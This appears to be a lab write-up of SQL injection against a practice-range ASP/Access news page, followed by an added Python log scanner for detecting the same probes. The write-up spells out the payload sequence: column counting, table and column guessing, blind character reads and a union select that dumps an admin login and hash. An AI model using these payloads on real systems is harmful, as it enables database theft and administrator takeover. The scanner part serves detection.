Target range: https://www.mozhe.cn/bug/detail/82
First, http://219.153.49.228:49543/new_list.asp?id=1 order by 4
It errors out at 5,
so the table has four columns.
Next, query piece by piece.
The query patterns are as follows:
Check a table: and exists (select * from table_name)
Check a column: and exists (select column_name from table_name)
Read data: 1. determine the length, 2. determine each character's ASC value (ASCII code)
and (select top 1 len(column_name) from admin)=5
and (select top 1 asc(mid(column_name,position,1)) from admin)=97
So, querying step by step:
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select * from admin) √ (the table name has to be guessed; on simple ranges it is usually admin. A wrong guess shows a blank page, a correct guess renders the page normally.)
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select passwd from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select id from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select username from admin) √
Once those are confirmed, you still need to guess which of the order by columns username and passwd fall into. Since there are four, I tried them exhaustively: username is the second column and passwd the third.
http://219.153.49.228:49543/new_list.asp?id=1 union select 1,username,passwd,4 from admin
This dumps the account: moke/7e6ec4fadf84938f. After decrypting the hash with cmd5, I logged into the admin backend successfully.
My impression is that Access requires far more guessing than MySQL; with MySQL you can guess with some basis, with Access you cannot.
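From the defender's side, every step above leaves a distinctive request in the web server log. The following is an added example (not part of the original writeup) that scans constructed sample access-log lines for the probe patterns used here: the order by column count, the and exists (select ...) table/column checks, the asc(mid(...)) blind character reads, and the final union select; the log lines, IP and timestamps are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probing steps this writeup walks through, matched
# against the URL-decoded query string. Each entry is (tag, regex).
SIGNATURES = [
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("table/column-probe", re.compile(r"\band\s+exists\s*\(\s*select\b", re.I)),
    ("blind-length", re.compile(r"\blen\s*\(", re.I)),
    ("blind-char", re.compile(r"\basc\s*\(\s*mid\s*\(", re.I)),
    ("union-dump", re.compile(r"\bunion\s+select\b", re.I)),
]

def classify_query(query_string: str) -> list[str]:
    """Return the tags of every signature found in one query string."""
    decoded = unquote_plus(query_string)  # handles %20 and '+' encodings
    return [tag for tag, rx in SIGNATURES if rx.search(decoded)]

# Constructed sample access-log lines (not from the original page); the
# paths mirror the writeup's new_list.asp?id= pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /new_list.asp?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0800] "GET /new_list.asp?id=1%20order%20by%205 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:03 +0800] "GET /new_list.asp?id=1+and+exists+(select+*+from+admin) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:04 +0800] "GET /new_list.asp?id=1+and+(select+top+1+asc(mid(username,1,1))+from+admin)=97 HTTP/1.1" 200 17
10.0.0.5 - - [01/Jan/2024:10:00:05 +0800] "GET /new_list.asp?id=1+union+select+1,username,passwd,4+from+admin HTTP/1.1" 200 5300
"""

REQUEST_RX = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (request_path, tags) for each log line that hits a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RX.search(line)
        if not m:
            continue
        path = m.group(1)
        query = path.partition("?")[2]
        tags = classify_query(query)
        if tags:
            hits.append((path, tags))
    return hits

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(tags, path)
```

Seeing several of these tags from one client in quick succession, especially a 500 on the order by probe followed by a union select, is the sequence this writeup describes and is worth alerting on.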